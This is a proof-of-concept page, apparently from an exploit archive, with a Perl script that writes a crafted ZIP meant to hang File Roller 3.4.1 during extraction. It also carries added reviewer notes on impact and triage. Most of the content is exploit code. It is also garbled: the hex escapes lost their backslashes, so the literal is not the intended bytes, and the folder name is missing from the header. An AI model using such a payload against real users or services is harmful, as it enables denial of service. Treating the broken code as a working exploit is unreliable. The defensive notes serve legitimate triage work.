File Roller 3.4.1 Denial Of Service
Posted on 10 July 2015
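#!/usr/bin/perl
#
# Title: File Roller - DoS PoC
# Date: 08/07/2015
# Author: Arsyntex
# Homepage: https://wiki.gnome.org/Apps/FileRoller
# Version: v3.4.1
# Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux
# -------------------------------------------------------------------------
# Create a zip file with a folder inside named:
#
#
# Run: file-roller --extract-here test.zip
#
# Result: endless calls to lstat64() (50 % CPU usage) (Freeze app)
#
# NOTE(review): the folder name is not legible in the header above. Read as
# hex bytes, the filename field in the data below is 0x23 0x2f ("#/").
# NOTE(review): the Run line says test.zip, but this script writes poc.zip.
#
# Reviewer notes (defensive reading):
#   * Impact as described by the author is a local hang: the extracting
#     process spins on lstat64() and stops responding. It needs a user (or
#     an automated job) to extract the archive with the affected version.
#   * The page names v3.4.1 as affected and gives no fixed version or
#     advisory id; check the distribution's own advisories before assuming
#     a given build is patched.
#   * Triage signal: a file-roller process that stays CPU-bound after an
#     extract, with a syscall trace showing repeated lstat64() calls.
#   * Services that unpack user-supplied archives should run the extractor
#     with a CPU/time limit so a hang of this kind is bounded.

use strict;
use warnings;

# Archive contents. Read as hex bytes, the data is three ZIP records: a local
# file header (PK\x03\x04), one central directory entry (PK\x01\x02) and the
# end-of-central-directory record (PK\x05\x06), describing a single
# zero-length entry with a two-byte name.
# NOTE(review): as printed on this page the escapes carry no backslashes, so
# the literal below is plain ASCII text and not those bytes; presumably the
# backslashes were lost when the page was extracted. The literal is kept
# exactly as the page shows it.
my $zip =
      "x50x4bx03x04x14x03x00x00x00x00xd6x55x9cx46x00x00"
    . "x00x00x00x00x00x00x00x00x00x00x02x00x00x00x23x2f"
    . "x50x4bx01x02x3fx03x14x03x00x00x00x00xd6x55x9cx46"
    . "x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00"
    . "x00x00x00x00x00x00x10x80xfdx41x00x00x00x00x23x2f"
    . "x50x4bx05x06x00x00x00x00x01x00x01x00x30x00x00x00"
    . "x20x00x00x00x00x00";

my $out_path = 'poc.zip';

# Three-argument open with a lexical handle: the mode can never be taken from
# the file name, and the handle is scoped to this script instead of being a
# package-global bareword. The OS error ($!) is reported on every failure.
open my $out_fh, '>', $out_path
    or die "Can't open $out_path: $!\n";

# Binary mode so no newline or encoding layer rewrites the data on output.
binmode $out_fh;

print {$out_fh} $zip
    or die "Can't write $out_path: $!\n";

# Buffered write errors only surface at close, so check it as well.
close $out_fh
    or die "Can't close $out_path: $!\n";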
